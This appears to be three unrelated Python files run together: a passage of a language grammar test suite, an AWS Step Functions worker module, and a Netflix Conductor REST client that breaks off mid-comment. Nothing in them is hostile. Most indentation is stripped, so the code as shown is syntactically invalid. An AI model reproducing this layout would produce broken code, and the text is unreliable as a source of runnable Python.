def f(a, b:1, c:2, d, e:3=4, f=5, *g:6, h:7, i=8, j:9=10,
**k:11) -> 12: pass
self.assertEqual(f.__annotations__,
{'b': 1, 'c': 2, 'e': 3, 'g': 6, 'h': 7, 'j': 9,
'k': 11, 'return': 12})
# Check for SF Bug #1697248 - mixing decorators and a return annotation
def null(x): return x
@null
def f(x) -> list: pass
self.assertEqual(f.__annotations__, {'return': list})
# test MAKE_CLOSURE with a variety of oparg's
closure = 1
def f(): return closure
def f(x=1): return closure
def f(*, k=1): return closure
def f() -> int: return closure
# Check ast errors in *args and *kwargs
check_syntax_error(self, "f(*g(1=2))")
check_syntax_error(self, "f(**g(1=2))")
def testLambdef(self):
### lambdef: 'lambda' [varargslist] ':' test
l1 = lambda : 0
self.assertEqual(l1(), 0)
l2 = lambda : a[d] # XXX just testing the expression
l3 = lambda : [2 < x for x in [-1, 3, 0]]
self.assertEqual(l3(), [0, 1, 0])
l4 = lambda x = lambda y = lambda z=1 : z : y() : x()
self.assertEqual(l4(), 1)
l5 = lambda x, y, z=2: x + y + z
self.assertEqual(l5(1, 2), 5)
self.assertEqual(l5(1, 2, 3), 6)
check_syntax_error(self, "lambda x: x = 2")
check_syntax_error(self, "lambda (None,): None")
l6 = lambda x, y, *, k=20: x+y+k
self.assertEqual(l6(1,2), 1+2+20)
self.assertEqual(l6(1,2,k=10), 1+2+10)
### stmt: simple_stmt | compound_stmt
# Tested below
def testSimpleStmt(self):
### simple_stmt: small_stmt (';' small_stmt)* [';']
x = 1; pass; del x
def foo():
# verify statements that end with semi-colons
x = 1; pass; del x;
foo()
### small_stmt: expr_stmt | pass_stmt | del_stmt | flow_stmt | import_stmt | global_stmt | access_stmt
# Tested below
def testExprStmt(self):
# (exprlist '=')* exprlist
1
1, 2, 3
x = 1
x = 1, 2, 3
x = y = z = 1, 2, 3
x, y, z = 1, 2, 3
abc = a, b, c = x, y, z = xyz = 1, 2, (3, 4)
check_syntax_error(self, "x + 1 = 1")
check_syntax_error(self, "a + 1 = b + 2")
def testDelStmt(self):
# 'del' exprlist
abc = [1,2,3]
x, y, z = abc
xyz = x, y, z
del abc
del x, y, (z, xyz)
def testPassStmt(self):
# 'pass'
pass
# flow_stmt: break_stmt | continue_stmt | return_stmt | raise_stmt
# Tested below
def testBreakStmt(self):
# 'break'
while 1: break
def testContinueStmt(self):
# 'continue'
i = 1
while i: i = 0; continue
msg = ""
while not msg:
msg = "ok"
try:
continue
msg = "continue failed to continue inside try"
except:
msg = "continue inside try called except block"
if msg != "ok":
self.fail(msg)
msg = ""
while not msg:
msg = "finally block not called"
try:
continue
finally:
msg = "ok"
if msg != "ok":
self.fail(msg)
def test_break_continue_loop(self):
# This test warrants an explanation. It is a test specifically for SF bugs
# #463359 and #462937. The bug is that a 'break' statement executed or
# exception raised inside a try/except inside a loop, *after* a continue
# statement has been executed in that loop, will cause the wrong number of
# arguments to be popped off the stack and the instruction pointer reset to
# a very small number (usually 0.) Because of this, the following test
# *must* be written as a function, and the tracking vars *must* be function
# arguments with default values. Otherwise, the test will loop and loop.
def test_inner(extra_burning_oil = 1, count=0):
big_hippo = 2
while big_hippo:
count += 1
try:
if extra_burning_oil and big_hippo == 1:
extra_burning_oil -= 1
break
big_hippo -= 1
continue
except:
raise
if count > 2 or big_hippo != 1:
self.fail("continue then break in try/except in loop broken!")
test_inner()
def testReturn(self):
# 'return' [testlist]
def g1(): return
def g2(): return 1
g1()
x = g2()
check_syntax_error(self, "class foo:return 1")
def testYield(self):
check_syntax_error(self, "class foo:yield 1")
def testRaise(self):
# 'raise' test [',' test]
try: raise RuntimeError('just testing')
except RuntimeError: pass
try: raise KeyboardInterrupt
except KeyboardInterrupt: pass
def testImport(self):
# 'import' dotted_as_names
import sys
import time, sys
# 'from' dotted_name 'import' ('*' | '(' import_as_names ')' | import_as_names)
from time import time
from time import (time)
# not testable inside a function, but already done at top of the module
# from sys import *
from sys import path, argv
from sys import (path, argv)
from sys import (path, argv,)
def testGlobal(self):
# 'global' NAME (',' NAME)*
global a
global a, b
global one, two, three, four, five, six, seven, eight, nine, ten
def testNonlocal(self):
# 'nonlocal' NAME (',' NAME)*
x = 0
y = 0
def f():
nonlocal x
nonlocal x, y
def testAssert(self):
# assert_stmt: 'assert' test [',' test]
assert 1
assert 1, 1
assert lambda x:x
assert 1, lambda x:x+1
try:
assert True
except AssertionError as e:
self.fail("'assert True' should not have raised an AssertionError")
try:
assert True, 'this should always pass'
except AssertionError as e:
self.fail("'assert True, msg' should not have "
"raised an AssertionError")
# these tests fail if python is run with -O, so check __debug__
@unittest.skipUnless(__debug__, "Won't work if __debug__ is False")
def testAssert2(self):
try:
assert 0, "msg"
except AssertionError as e:
self.assertEqual(e.args[0], "msg")
else:
self.fail("AssertionError not raised by assert 0")
try:
assert False
except AssertionError as e:
self.assertEqual(len(e.args), 0)
else:
self.fail("AssertionError not raised by 'assert False'")
### compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt | funcdef | classdef
# Tested below
def testIf(self):
# 'if' test ':' suite ('elif' test ':' suite)* ['else' ':' suite]
if 1: pass
if 1: pass
else: pass
if 0: pass
elif 0: pass
if 0: pass
elif 0: pass
elif 0: pass
elif 0: pass
else: pass
def testWhile(self):
# 'while' test ':' suite ['else' ':' suite]
while 0: pass
while 0: pass
else: pass
# Issue1920: "while 0" is optimized away,
# ensure that the "else" clause is still present.
x = 0
while 0:
x = 1
else:
x = 2
self.assertEqual(x, 2)
def testFor(self):
# 'for' exprlist 'in' exprlist ':' suite ['else' ':' suite]
for i in 1, 2, 3: pass
for i, j, k in (): pass
else: pass
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self): return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n = n+1
return self.sofar[i]
n = 0
for x in Squares(10): n = n+x
if n != 285:
self.fail('for over growing sequence')
result = []
for x, in [(1,), (2,), (3,)]:
result.append(x)
self.assertEqual(result, [1, 2, 3])
def testTry(self):
### try_stmt: 'try' ':' suite (except_clause ':' suite)+ ['else' ':' suite]
### | 'try' ':' suite 'finally' ':' suite
### except_clause: 'except' [expr ['as' expr]]
try:
1/0
except ZeroDivisionError:
pass
else:
pass
try: 1/0
except EOFError: pass
except TypeError as msg: pass
except RuntimeError as msg: pass
except: pass
else: pass
try: 1/0
except (EOFError, TypeError, ZeroDivisionError): pass
try: 1/0
except (EOFError, TypeError, ZeroDivisionError) as msg: pass
try: pass
finally: pass
def testSuite(self):
# simple_stmt | NEWLINE INDENT NEWLINE* (stmt NEWLINE*)+ DEDENT
if 1: pass
if 1:
pass
if 1:
#
#
#
pass
pass
#
pass
#
def testTest(self):
### and_test ('or' and_test)*
### and_test: not_test ('and' not_test)*
### not_test: 'not' not_test | comparison
if not 1: pass
if 1 and 1: pass
if 1 or 1: pass
if not not not 1: pass
if not 1 and 1 and 1: pass
if 1 and 1 or 1 and 1 and 1 or not 1 and 1: pass
def testComparison(self):
### comparison: expr (comp_op expr)*
### comp_op: '<'|'>'|'=='|'>='|'<='|'!='|'in'|'not' 'in'|'is'|'is' 'not'
if 1: pass
x = (1 == 1)
if 1 == 1: pass
if 1 != 1: pass
if 1 < 1: pass
if 1 > 1: pass
if 1 <= 1: pass
if 1 >= 1: pass
if 1 is 1: pass
if 1 is not 1: pass
if 1 in (): pass
if 1 not in (): pass
if 1 < 1 > 1 == 1 >= 1 <= 1 != 1 in 1 not in 1 is 1 is not 1: pass
def testBinaryMaskOps(self):
x = 1 & 1
x = 1 ^ 1
x = 1 | 1
def testShiftOps(self):
x = 1 << 1
x = 1 >> 1
x = 1 << 1 >> 1
def testAdditiveOps(self):
x = 1
x = 1 + 1
x = 1 - 1 - 1
x = 1 - 1 + 1 - 1 + 1
def testMultiplicativeOps(self):
x = 1 * 1
x = 1 / 1
x = 1 % 1
x = 1 / 1 * 1 % 1
def testUnaryOps(self):
x = +1
x = -1
x = ~1
x = ~1 ^ 1 & 1 | 1 & 1 ^ -1
x = -1*1/1 + 1*1 - ---1*1
def testSelectors(self):
### trailer: '(' [testlist] ')' | '[' subscript ']' | '.' NAME
### subscript: expr | [expr] ':' [expr]
import sys, time
c = sys.path[0]
x = time.time()
x = sys.modules['time'].time()
a = '01234'
c = a[0]
c = a[-1]
s = a[0:5]
s = a[:5]
s = a[0:]
s = a[:]
s = a[-5:]
s = a[:-1]
s = a[-4:-3]
# A rough test of SF bug 1333982. http://python.org/sf/1333982
# The testing here is fairly incomplete.
# Test cases should include: commas with 1 and 2 colons
d = {}
d[1] = 1
d[1,] = 2
d[1,2] = 3
d[1,2,3] = 4
L = list(d)
L.sort(key=lambda x: x if isinstance(x, tuple) else ())
self.assertEqual(str(L), '[1, (1,), (1, 2), (1, 2, 3)]')
def testAtoms(self):
### atom: '(' [testlist] ')' | '[' [testlist] ']' | '{' [dictsetmaker] '}' | NAME | NUMBER | STRING
### dictsetmaker: (test ':' test (',' test ':' test)* [',']) | (test (',' test)* [','])
x = (1)
x = (1 or 2 or 3)
x = (1 or 2 or 3, 2, 3)
x = []
x = [1]
x = [1 or 2 or 3]
x = [1 or 2 or 3, 2, 3]
x = []
x = {}
x = {'one': 1}
x = {'one': 1,}
x = {'one' or 'two': 1 or 2}
x = {'one': 1, 'two': 2}
x = {'one': 1, 'two': 2,}
x = {'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6}
x = {'one'}
x = {'one', 1,}
x = {'one', 'two', 'three'}
x = {2, 3, 4,}
x = x
x = 'x'
x = 123
### exprlist: expr (',' expr)* [',']
### testlist: test (',' test)* [',']
# These have been exercised enough above
def testClassdef(self):
# 'class' NAME ['(' [testlist] ')'] ':' suite
class B: pass
class B2(): pass
class C1(B): pass
class C2(B): pass
class D(C1, C2, B): pass
class C:
def meth1(self): pass
def meth2(self, arg): pass
def meth3(self, a1, a2): pass
# decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
# decorators: decorator+
# decorated: decorators (classdef | funcdef)
def class_decorator(x): return x
@class_decorator
class G: pass
def testDictcomps(self):
# dictorsetmaker: ( (test ':' test (comp_for |
# (',' test ':' test)* [','])) |
# (test (comp_for | (',' test)* [','])) )
nums = [1, 2, 3]
self.assertEqual({i:i+1 for i in nums}, {1: 2, 2: 3, 3: 4})
def testListcomps(self):
# list comprehension tests
nums = [1, 2, 3, 4, 5]
strs = ["Apple", "Banana", "Coconut"]
spcs = [" Apple", " Banana ", "Coco nut "]
self.assertEqual([s.strip() for s in spcs], ['Apple', 'Banana', 'Coco nut'])
self.assertEqual([3 * x for x in nums], [3, 6, 9, 12, 15])
self.assertEqual([x for x in nums if x > 2], [3, 4, 5])
self.assertEqual([(i, s) for i in nums for s in strs],
[(1, 'Apple'), (1, 'Banana'), (1, 'Coconut'),
(2, 'Apple'), (2, 'Banana'), (2, 'Coconut'),
(3, 'Apple'), (3, 'Banana'), (3, 'Coconut'),
(4, 'Apple'), (4, 'Banana'), (4, 'Coconut'),
(5, 'Apple'), (5, 'Banana'), (5, 'Coconut')])
self.assertEqual([(i, s) for i in nums for s in [f for f in strs if "n" in f]],
[(1, 'Banana'), (1, 'Coconut'), (2, 'Banana'), (2, 'Coconut'),
(3, 'Banana'), (3, 'Coconut'), (4, 'Banana'), (4, 'Coconut'),
(5, 'Banana'), (5, 'Coconut')])
self.assertEqual([(lambda a:[a**i for i in range(a+1)])(j) for j in range(5)],
[[1], [1, 1], [1, 2, 4], [1, 3, 9, 27], [1, 4, 16, 64, 256]])
def test_in_func(l):
return [0 < x < 3 for x in l if x > 2]
self.assertEqual(test_in_func(nums), [False, False, False])
def test_nested_front():
self.assertEqual([[y for y in [x, x + 1]] for x in [1,3,5]],
[[1, 2], [3, 4], [5, 6]])
test_nested_front()
check_syntax_error(self, "[i, s for i in nums for s in strs]")
check_syntax_error(self, "[x if y]")
suppliers = [
(1, "Boeing"),
(2, "Ford"),
(3, "Macdonalds")
]
parts = [
(10, "Airliner"),
(20, "Engine"),
(30, "Cheeseburger")
]
suppart = [
(1, 10), (1, 20), (2, 20), (3, 30)
]
x = [
(sname, pname)
for (sno, sname) in suppliers
for (pno, pname) in parts
for (sp_sno, sp_pno) in suppart
if sno == sp_sno and pno == sp_pno
]
self.assertEqual(x, [('Boeing', 'Airliner'), ('Boeing', 'Engine'), ('Ford', 'Engine'),
('Macdonalds', 'Cheeseburger')])
def testGenexps(self):
# generator expression tests
g = ([x for x in range(10)] for x in range(1))
self.assertEqual(next(g), [x for x in range(10)])
try:
next(g)
self.fail('should produce StopIteration exception')
except StopIteration:
pass
a = 1
try:
g = (a for d in a)
next(g)
self.fail('should produce TypeError')
except TypeError:
pass
self.assertEqual(list((x, y) for x in 'abcd' for y in 'abcd'), [(x, y) for x in 'abcd' for y in 'abcd'])
self.assertEqual(list((x, y) for x in 'ab' for y in 'xy'), [(x, y) for x in 'ab' for y in 'xy'])
a = [x for x in range(10)]
b = (x for x in (y for y in a))
self.assertEqual(sum(b), sum([x for x in range(10)]))
self.assertEqual(sum(x**2 for x in range(10)), sum([x**2 for x in range(10)]))
self.assertEqual(sum(x*x for x in range(10) if x%2), sum([x*x for x in range(10) if x%2]))
self.assertEqual(sum(x for x in (y for y in range(10))), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10)))), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in [y for y in (z for z in range(10))]), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10) if True)) if True), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10) if True) if False) if True), 0)
check_syntax_error(self, "foo(x for x in range(10), 100)")
check_syntax_error(self, "foo(100, x for x in range(10))")
def testComprehensionSpecials(self):
# test for outermost iterable precomputation
x = 10; g = (i for i in range(x)); x = 5
self.assertEqual(len(list(g)), 10)
# This should hold, since we're only precomputing the outermost iterable.
x = 10; t = False; g = ((i,j) for i in range(x) if t for j in range(x))
x = 5; t = True;
self.assertEqual([(i,j) for i in range(10) for j in range(5)], list(g))
# Grammar allows multiple adjacent 'if's in listcomps and genexps,
# even though it's silly. Make sure it works (ifelse broke this.)
self.assertEqual([ x for x in range(10) if x % 2 if x % 3 ], [1, 5, 7])
self.assertEqual(list(x for x in range(10) if x % 2 if x % 3), [1, 5, 7])
# verify unpacking single element tuples in listcomp/genexp.
self.assertEqual([x for x, in [(4,), (5,), (6,)]], [4, 5, 6])
self.assertEqual(list(x for x, in [(7,), (8,), (9,)]), [7, 8, 9])
def test_with_statement(self):
class manager(object):
def __enter__(self):
return (1, 2)
def __exit__(self, *args):
pass
with manager():
pass
with manager() as x:
pass
with manager() as (x, y):
pass
with manager(), manager():
pass
with manager() as x, manager() as y:
pass
with manager() as x, manager():
pass
def testIfElseExpr(self):
# Test ifelse expressions in various cases
def _checkeval(msg, ret):
"helper to check that evaluation of expressions is done correctly"
print(x)
return ret
# the next line is not allowed anymore
#self.assertEqual([ x() for x in lambda: True, lambda: False if x() ], [True])
self.assertEqual([ x() for x in (lambda: True, lambda: False) if x() ], [True])
self.assertEqual([ x(False) for x in (lambda x: False if x else True, lambda x: True if x else False) if x(False) ], [True])
self.assertEqual((5 if 1 else _checkeval("check 1", 0)), 5)
self.assertEqual((_checkeval("check 2", 0) if 0 else 5), 5)
self.assertEqual((5 and 6 if 0 else 1), 1)
self.assertEqual(((5 and 6) if 0 else 1), 1)
self.assertEqual((5 and (6 if 1 else 1)), 6)
self.assertEqual((0 or _checkeval("check 3", 2) if 0 else 3), 3)
self.assertEqual((1 or _checkeval("check 4", 2) if 1 else _checkeval("check 5", 3)), 1)
self.assertEqual((0 or 5 if 1 else _checkeval("check 6", 3)), 5)
self.assertEqual((not 5 if 1 else 1), False)
self.assertEqual((not 5 if 0 else 1), 1)
self.assertEqual((6 + 1 if 1 else 2), 7)
self.assertEqual((6 - 1 if 1 else 2), 5)
self.assertEqual((6 * 2 if 1 else 4), 12)
self.assertEqual((6 / 2 if 1 else 3), 3)
self.assertEqual((6 < 4 if 0 else 2), 2)
def test_paren_evaluation(self):
self.assertEqual(16 // (4 // 2), 8)
self.assertEqual((16 // 4) // 2, 2)
self.assertEqual(16 // 4 // 2, 2)
self.assertTrue(False is (2 is 3))
self.assertFalse((False is 2) is 3)
self.assertFalse(False is 2 is 3)
def test_main():
run_unittest(TokenTests, GrammarTests)
if __name__ == '__main__':
test_main()
|
|
import logging
import json
import time
import boto3
from botocore.config import Config as BotoCoreConfig
from botocore.exceptions import ClientError
import signal
from abc import ABCMeta, abstractmethod
from threading import Thread, Lock
from .util import safe_cause
logger = logging.getLogger('stefuna')
_default_sigterm_handler = signal.signal(signal.SIGTERM, signal.SIG_DFL)
class Worker(object):
"""
There is a single instance of a Worker object in each worker process.
Subclass this class and override the run_task() method.
"""
__metaclass__ = ABCMeta
# This is set to the single worker instance per child process.
worker_instance = None
# Subclasses can use this worker logger if they wish.
logger = logger
def __init__(self, config=None, region=None, heartbeat=0):
self.config = config
boto_config = BotoCoreConfig(region_name=region)
self.sf_client = boto3.client('stepfunctions', config=boto_config)
# This will be set to the current task_token of a running task.
self.task_token = None
# If heartbeats are enabled, the heartbeat thread is created once
# and left running. Thus, the exact timing of the heartbeats is
# somewhat random, but they will be at most heartbeat seconds apart.
self.heartbeat_sf_client = None
if heartbeat:
self.token_lock = Lock()
self._set_task_token(None)
self._heartbeat_fail_token = None
self.heartbeat_thread = Thread(target=self._run_heartbeat_thread,
name='heartbeat',
args=(region, heartbeat), daemon=True)
self.heartbeat_thread.start()
else:
self.token_lock = None
self._set_task_token(None)
self.heartbeat_thread = None
self.init()
def init(self):
"""
Called once when the worker process is created.
Can be overridden in a subclass to initialize the worker instance.
The instance will be set up and the self.config will be set when
this is called.
"""
pass
def _set_task_token(self, task_token):
"""
We guard task_token with a lock because it's accessed from the
heartbeat thread.
"""
if self.token_lock is not None:
self.token_lock.acquire()
self.task_token = task_token
self.task_token_time = time.time() if task_token is not None else None
if self.token_lock is not None:
self.token_lock.release()
def _run_task(self, task_token, input_data):
"""
Run a task while ensuring that no exception escapes the worker.
"""
self._task_result_status = None
try:
self._set_task_token(task_token)
self.logger.debug('Running task')
try:
input_data = json.loads(input_data)
except ValueError as e:
raise ValueError('Error parsing task input json: {0}'.format(e))
task_result = self.run_task(task_token, input_data)
# We send the success result if we haven't sent a
# success or failure already for this task.
if self._task_result_status is None:
if type(task_result) is not str:
task_result = (json.dumps(task_result) if task_result
is not None else '{}')
self.send_task_success(task_result)
except Exception as e:
self.logger.exception('Exception running task')
if self._task_result_status is None:
error = 'Task.Failure'
cause = 'Exception raised during task run: {0}'.format(e)
self.send_task_failure(error, cause)
finally:
status = 'task_success' if self._task_result_status \
else 'task_failure'
self.logger.debug('Task complete with %s', status)
try:
self._set_task_token(None)
except Exception:
self.logger.exception('Exception clearing task token')
return (task_token, status)
@abstractmethod
def run_task(self, task_token, input_data):
"""
To be overridden in a Worker subclass to run the task.
A success result can be returned as a dict or JSON string.
If there is an error running the task, self.send_task_failure()
should be called or an exception should be raised.
"""
self.logger.warning('Override Worker run_task() in your worker subclass.')
def send_task_success(self, task_result):
try:
self.sf_client.send_task_success(
taskToken=self.task_token,
output=task_result
)
self._task_result_status = True
except Exception:
# We log the error and the task state will eventually timeout
self.logger.exception('Error sending task success for task')
self._task_result_status = False
def send_task_failure(self, error, cause):
try:
self.sf_client.send_task_failure(
taskToken=self.task_token,
error=error,
cause=safe_cause(cause)
)
except Exception:
# We log the error and the task state will eventually timeout
self.logger.exception('Error sending task failure for task')
finally:
self._task_result_status = False
def heartbeat(self, token):
"""Called from the heartbeat thread every X seconds"""
if token is not None and token != self._heartbeat_fail_token:
try:
self.logger.debug('Sending heartbeat for task')
self.heartbeat_sf_client.send_task_heartbeat(taskToken=token)
self._heartbeat_fail_token = None
except ClientError as e:
ecode = e.response['Error'].get('Code', 'Unknown')
if ecode in ['TaskDoesNotExist', 'InvalidToken', 'TaskTimedOut']:
# We set the heartbeat_fail_token so we don't retry a heartbeat for this token.
self._heartbeat_fail_token = token
# We only use debug level logging since the task was either deleted or has ended.
self.logger.debug('Error sending heartbeat for task: %s', ecode)
else:
self.logger.exception('Error sending heartbeat for task')
except Exception:
self.logger.exception('Error sending heartbeat for task')
def _run_heartbeat_thread(self, region, beat):
self.logger.info('Started heartbeat_thread %d', beat)
boto_config = BotoCoreConfig(region_name=region)
self.heartbeat_sf_client = boto3.client('stepfunctions', config=boto_config)
while True:
self.token_lock.acquire()
token = self.task_token
token_time = self.task_token_time
self.token_lock.release()
if token is None:
time.sleep(beat)
else:
delta = time.time() - token_time
if delta + 0.5 < beat:
time.sleep(beat - delta) # sleep until beat seconds from start of token processing
else:
self.heartbeat(token)
time.sleep(beat)
def init_worker(worker_class, worker_config, region, heartbeat, loglevel):
"""
One-time initialize of each worker process.
"""
logger.info('Initializing worker')
signal.signal(signal.SIGTERM, _default_sigterm_handler)
signal.signal(signal.SIGINT, signal.SIG_IGN)
if loglevel is not None:
logger.setLevel(loglevel)
logging.getLogger('').setLevel(loglevel)
# Create the single instance.
Worker.worker_instance = worker_class(config=worker_config, region=region,
heartbeat=heartbeat)
def run_worker_task(task_token, input_data):
"""
Called via a Pool; runs in a child process.
"""
return Worker.worker_instance._run_task(task_token, input_data)
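# ---------------------------------------------------------------------------
# Minimal sketch of a Worker subclass (the class name and result shape are
# illustrative assumptions; stefuna itself invokes init_worker() and
# run_worker_task() from its worker pool).
class EchoWorker(Worker):
    def run_task(self, task_token, input_data):
        # input_data has already been parsed from JSON by _run_task();
        # returning a dict sends it back as the task success output.
        return {'echo': input_data}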
|
|
#
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import requests
import json
import sys
import socket
hostname = socket.gethostname()
class BaseClient(object):
printUrl = False
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
def __init__(self, baseURL, baseResource):
self.baseURL = baseURL
self.baseResource = baseResource
def get(self, resPath, queryParams=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
resp = requests.get(theUrl, params=queryParams)
self.__checkForSuccess(resp)
if(resp.content == b''):
return None
else:
return resp.json()
def post(self, resPath, queryParams, body, headers=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
theHeader = self.headers
if headers is not None:
theHeader = self.mergeTwoDicts(self.headers, headers)
if body is not None:
jsonBody = json.dumps(body, ensure_ascii=False)
resp = requests.post(theUrl, params=queryParams, data=jsonBody, headers=theHeader)
else:
resp = requests.post(theUrl, params=queryParams, headers=theHeader)
self.__checkForSuccess(resp)
return self.__return(resp, theHeader)
def put(self, resPath, queryParams=None, body=None, headers=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
theHeader = self.headers
if headers is not None:
theHeader = self.mergeTwoDicts(self.headers, headers)
if body is not None:
jsonBody = json.dumps(body, ensure_ascii=False)
resp = requests.put(theUrl, params=queryParams, data=jsonBody, headers=theHeader)
else:
resp = requests.put(theUrl, params=queryParams, headers=theHeader)
self.__print(resp)
self.__checkForSuccess(resp)
def delete(self, resPath, queryParams):
theUrl = "{}/{}".format(self.baseURL, resPath)
resp = requests.delete(theUrl, params=queryParams)
self.__print(resp)
self.__checkForSuccess(resp)
def makeUrl(self, urlformat=None, *argv):
url = self.baseResource + '/'
if urlformat:
url += urlformat.format(*argv)
return url
def makeParams(self, **kwargs):
return dict((k, v) for k, v in kwargs.items() if v is not None) or None
def mergeTwoDicts(self, x, y):
z = x.copy()
z.update(y)
return z
def __print(self, resp):
if self.printUrl:
print(resp.url)
def __return(self, resp, header):
retval = ''
if len(resp.text) > 0:
if header['Accept'] == 'text/plain':
retval = resp.text
elif header['Accept'] == 'application/json':
retval = resp.json()
else:
retval = resp.text
return retval
def __checkForSuccess(self, resp):
try:
resp.raise_for_status()
except requests.HTTPError:
print("ERROR: " + resp.text)
raise
class MetadataClient(BaseClient):
BASE_RESOURCE = 'metadata'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getWorkflowDef(self, wfname, version=None):
url = self.makeUrl('workflow/{}', wfname)
return self.get(url, self.makeParams(version=version))
def createWorkflowDef(self, wfdObj):
url = self.makeUrl('workflow')
return self.post(url, None, wfdObj)
def updateWorkflowDefs(self, listOfWfdObj):
url = self.makeUrl('workflow')
self.put(url, None, listOfWfdObj)
def getAllWorkflowDefs(self):
url = self.makeUrl('workflow')
return self.get(url)
def unRegisterWorkflowDef(self, wfname, version):
url = self.makeUrl("workflow/{name}/{version}".format(name=wfname, version=version))
self.delete(url, None)
def getTaskDef(self, tdName):
url = self.makeUrl('taskdefs/{}', tdName)
return self.get(url)
def registerTaskDefs(self, listOfTaskDefObj):
url = self.makeUrl('taskdefs')
return self.post(url, None, listOfTaskDefObj)
def registerTaskDef(self, taskDefObj):
url = self.makeUrl('taskdefs')
self.put(url, None, taskDefObj)
def unRegisterTaskDef(self, tdName, reason=None):
url = self.makeUrl('taskdefs/{}', tdName)
self.delete(url, self.makeParams(reason=reason))
def getAllTaskDefs(self):
url = self.makeUrl('taskdefs')
return self.get(url)
class TaskClient(BaseClient):
BASE_RESOURCE = 'tasks'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getTask(self, taskId):
url = self.makeUrl('{}', taskId)
return self.get(url)
def updateTask(self, taskObj):
url = self.makeUrl('')
self.post(url, None, taskObj)
def pollForTask(self, taskType, workerid, domain=None):
url = self.makeUrl('poll/{}', taskType)
params = {}
params['workerid'] = workerid
if domain is not None:
params['domain'] = domain
try:
return self.get(url, params)
except Exception as err:
print('Error while polling ' + str(err))
return None
def pollForBatch(self, taskType, count, timeout, workerid, domain=None):
url = self.makeUrl('poll/batch/{}', taskType)
params = {}
params['workerid'] = workerid
params['count'] = count
params['timeout'] = timeout
if domain is not None:
params['domain'] = domain
try:
return self.get(url, params)
except Exception as err:
print('Error while polling ' + str(err))
return None
def ackTask(self, taskId, workerid):
url = self.makeUrl('{}/ack', taskId)
params = {}
params['workerid'] = workerid
headers = {'Accept': 'application/json'}
value = self.post(url, params, None, headers)
return value == 'true'
def getTasksInQueue(self, taskName):
url = self.makeUrl('queue/{}', taskName)
return self.get(url)
def removeTaskFromQueue(self, taskId, reason=None):
url = self.makeUrl('queue/{}', taskId)
params = {}
params['reason'] = reason
self.delete(url, params)
def getTaskQueueSizes(self, listOfTaskName):
url = self.makeUrl('queue/sizes')
return self.post(url, None, listOfTaskName)
class WorkflowClient(BaseClient):
BASE_RESOURCE = 'workflow'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getWorkflow(self, wfId, includeTasks=True):
url = self.makeUrl('{}', wfId)
params = {}
params['includeTasks'] = includeTasks
return self.get(url, params)
def getRunningWorkflows(self, wfName, version=None, startTime=None, endTime=None):
url = self.makeUrl('running/{}', wfName)
params = {}
params['version'] = version
params['startTime'] = startTime
params['endTime'] = endTime
return self.get(url, params)
def startWorkflow(self, wfName, inputjson, version=None, correlationId=None):
url = self.makeUrl('{}', wfName)
params = {}
params['version'] = version
params['correlationId'] = correlationId
headers = {'Accept': 'text/plain'}
return self.post(url, params, inputjson, headers)
def terminateWorkflow(self, wfId, reason=None):
url = self.makeUrl('{}', wfId)
params = {}
params['reason'] = reason
self.delete(url, params)
def removeWorkflow(self, wfId, archiveWorkflow, reason=None):
url = self.makeUrl('{}/remove', wfId)
self.delete(url, self.makeParams(archiveWorkflow=archiveWorkflow, reason=reason))
def pauseWorkflow(self, wfId):
url = self.makeUrl('{}/pause', wfId)
self.put(url)
def resumeWorkflow(self, wfId):
url = self.makeUrl('{}/resume', wfId)
self.put(url)
def skipTaskFromWorkflow(self, wfId, taskRefName, skipTaskRequest):
url = self.makeUrl('{}/skiptask/{}', wfId, taskRefName)
self.post(url, None, skipTaskRequest)
def rerunWorkflow(self, wfId, taskRefName, rerunWorkflowRequest):
url = self.makeUrl('{}/rerun', wfId)
return self.post(url, None, rerunWorkflowRequest)
def restartWorkflow(self, wfId, taskRefName, fromTaskRef):
url = self.makeUrl('{}/restart', wfId)
params = {}
params['from'] = fromTaskRef
self.post(url, params, None)
class EventServicesClient(BaseClient):
BASE_RESOURCE = 'event'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getEventHandlerDef(self, event, activeOnly=True):
url = self.makeUrl('{}', event)
params = {}
params['activeOnly'] = activeOnly
return self.get(url, params)
def getEventHandlerDefs(self):
url = self.makeUrl()
return self.get(url)
def createEventHandlerDef(self, ehObj):
url = self.makeUrl()
return self.post(url, None, ehObj)
def updateEventHandlerDef(self, ehObj):
url = self.makeUrl()
return self.put(url, None, ehObj)
def removeEventHandler(self, ehName):
url = self.makeUrl('{}', ehName)
self.delete(url, {})
def getEventHandlerQueues(self):
url = self.makeUrl('queues')
return self.get(url)
def getEventHandlerQueuesProviders(self):
url = self.makeUrl('queues/providers')
return self.get(url)
class WFClientMgr:
def __init__(self, server_url='http://localhost:8080/api/'):
self.workflowClient = WorkflowClient(server_url)
self.taskClient = TaskClient(server_url)
self.metadataClient = MetadataClient(server_url)
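
# A hedged usage sketch (never called in this module): one poll/ack/complete
# cycle for a single worker, built from the clients above. The task type
# 'example_task' and the result fields ('taskId', 'inputData', 'status',
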